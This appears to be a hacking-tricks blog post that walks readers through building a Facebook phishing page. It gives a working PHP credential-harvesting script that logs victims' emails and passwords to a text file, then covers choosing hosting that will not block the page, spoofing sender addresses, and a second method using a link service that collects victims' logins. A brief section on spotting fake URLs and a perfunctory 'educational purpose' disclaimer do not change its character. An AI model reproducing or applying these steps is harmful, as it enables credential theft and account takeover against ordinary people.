hii hello I am back with new trick on today,keep visit daily and share this site to all your friends and make more view to supporting me to make new and high hacking trick to post
What is Phishing?
Phishing is a most popular technique used for hacking passwords and stealingsensitive information like credit cards, banking username & passwords etc.Phishing aka fishing attack is a process of creating a duplicate copy or a clone of a reputed website in the intention of stealing user’s password or other sensitive information like credit card details. It is easy for anyone who is having little technical knowledge to get a phishing page done and that is why this method is so popular.Phishing scams prompts users to enter sensitive details at a fake webpage (phishing page) whose look and feel are very identical to legitmate webpages. Inmost cases, the only difference is URL. URL can also be spoofed in some cases if the legitmate website is vulnerable.It is difficult for a commoner to identifythe phishing scams page because of its trustworthy layout.
How phishing works?
Hackers / Attackers target general public and send them phishing links through email or personal message where the victim is prompted to click on a link in the email. The user / victim will get navigated to aPhishing page that pretends to be legit. Common people who don’t find that phishing page suspicious are induced to enter their sensitive information and all the information would get sent to the hacker / attacker.
Phishing Example:-
Lets takeFacebookas an example, Creating a page which perfectly looks like Facebook login page but putting it ina different URL like fakebook.com or faecbook.com or any URL which pretends to be legit. When a user lands on such page, he/she might think that isreal Facebook login page and asking them to provide their username and password. So the people who don’t find the fake login page suspicious might enter their username, password and thepassword information would be sent to the hacker/attacker who created it, simultaneously the victim would get redirected to original Facebook page.Real Life Example: John is a programmer, he creates a Facebook login page with some scripts to enable him to get the username and password information and put it in https://www.Facebook.com/make-money-online-tricks. Peter is a friend of John. John sends a message to Peter “Hey Peter, I found a way to make money online easily you should definitelytake a look at this https://www.Facebook.com/make-money-online-tricks”. Peter navigate to the link and see a Facebook login page. As usual Peter enters his username and password of Facebook. Now the username and password of Peter is sent to John and Peter get redirected to a money making tips page https://www.Facebook.com/make-money-online-tricks-tips.html. That’s all Peter’s Facebook account is hacked.Read unbiasedSEMrush
Review
How to create a Phishing page inminutes?
We are going to take Facebook phishing page as an example.*.Go to Facebook.com, make sure youare not logged in to Facebook.*.Press Ctrl + U to view source code.*.Copy the source code and paste it in a notepad.*.Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl + F in notepad. In Facebook login page, action attribute was filled with Facebook login process url, replace it with process.php*.You have to find name of input fields using inspect element (Ctrl + Shft + I in Chrome), in our case it isemail and pass*.Save this file as index.html*.Now you have to get username and password stored in a text file named phishing.txt*.Create a file named process.php using the following code.
Process.php:-
<?if(isset($_POST[’email’]) && isset($_POST[‘pass’])){$password=file_get_contents(‘phishing.txt’);$phishing = fopen(“phishing.txt”,”w”);fwrite($phishing,$password.”Email : “.$_POST[’email’].” , Password”.$_POST[‘pass’].”\n”);fclose($file);echo ‘<script>window.location.href=”https://wwww.facebook.com/”</script>’;}elseecho ‘<script>window.location.href=”index.html”</script>’;?>
*How to host phishing page in a URL?*
To put phishing page in a URL, you need to have two things.1.Domain2.Web Hosting
Get a Free Domain
You can create a free domain at Bluehostif you pay for their hosting plans. Once you create a domain, you need to get hosting and setup name servers for it. If you select bluehost you don’t need to setup name servers since it will already be set.
Get Web Hosting
Almost all free hosting panels would block phishing pages. So you need to get any paid shared hosting package, it would cost around $4 USD per month. I prefer bluehost for their excellent service and performance.Get bluehost shared hosting and free domain now.Once you setup domain and hosting, you can upload the files using FTP software.That’s all you can test it now.
How could you protect yourself from phishing scams?
Hackers can reach you in many ways likeemail, personal messages, Facebook messages, Website ads etc. Clicking any links from these messages would lead you to a login page. Whenever you find aemail that navigates you to a webpage, you should note only one thing which isURL because nobody can spoof URL except when there is any XSS zero day vulnerability.What is the URL you see in browser address bar? Is that really https://www.LEGITWEBSITE.com? Is there any Green colour secure symbol (HTTPS) provided in the address bar? You can prevent hacking by remembering these questions. Also see the below examples of Facebook phishing pages.
Perfect Phishing
PagesNote the misleading URLMost of the people won’t suspect this page (snapshot given above) since thereis https prefix with green colour secure icon and no mistake in www.facebook.com. But this is a phishing page how? Note the URL correctly. It is https://www.facebook.com.infoknown.com so www.facebook.com is a subdomain of infoknown.com. Google Chrome don’t differentiate the sub-domain and domain unlike Firefox do. SSL Certificates (HTTPS) can be obtained from many vendors, few vendors give SSL Certificate for Free for 1 year. Its not a big deal for a novice to create a perfect phishing page like this. So be aware of it.Facebook Phishing Page – Note the misleading URL.This is a normal Facebook Phishing page with some modification in the word Facebook.Phishing scamsPhishing scams are attempts by scammers / hackers / cybercriminals to trick you to enter your sensitive infomation like internet banking username & passwords, credit card details etc. As described above, phishingscams focuses on retrieving monetary details indirectly.
Phishing email
Most of the time phishing scams happens through email. Hackers spoof the email address of any legitmate website or authority to send phishing scam email, so the users are convinced to believe that the email is sent from a legit website. Email address can be easily spoofed using email headers. Server scripting languages like php helps a commoner to spoof from email address easily. Popuplar email services like gmail are smart enough to identify phishing email and route it to spam folder. But still there are some ways for a hacker to send phishing emails
Second method:-
1.Open browser and search anomor.com
2.make click on sign up account and make new account in it
3.verify Your email ID by click on verify link in your mail
4.again log in to that account.
5.click on home option on left side of the page.
6.make a link on it
7.share that link to all which your victims should be hack password and user ID
8.make click on my victim option and get all password who login through that link
This post only educational propuse only,so please didn't cause any harm to any one we didn't responsible for that harm caused by you.
Plz share this to all.
Keep visiting this site daily.....
0 coment�rios: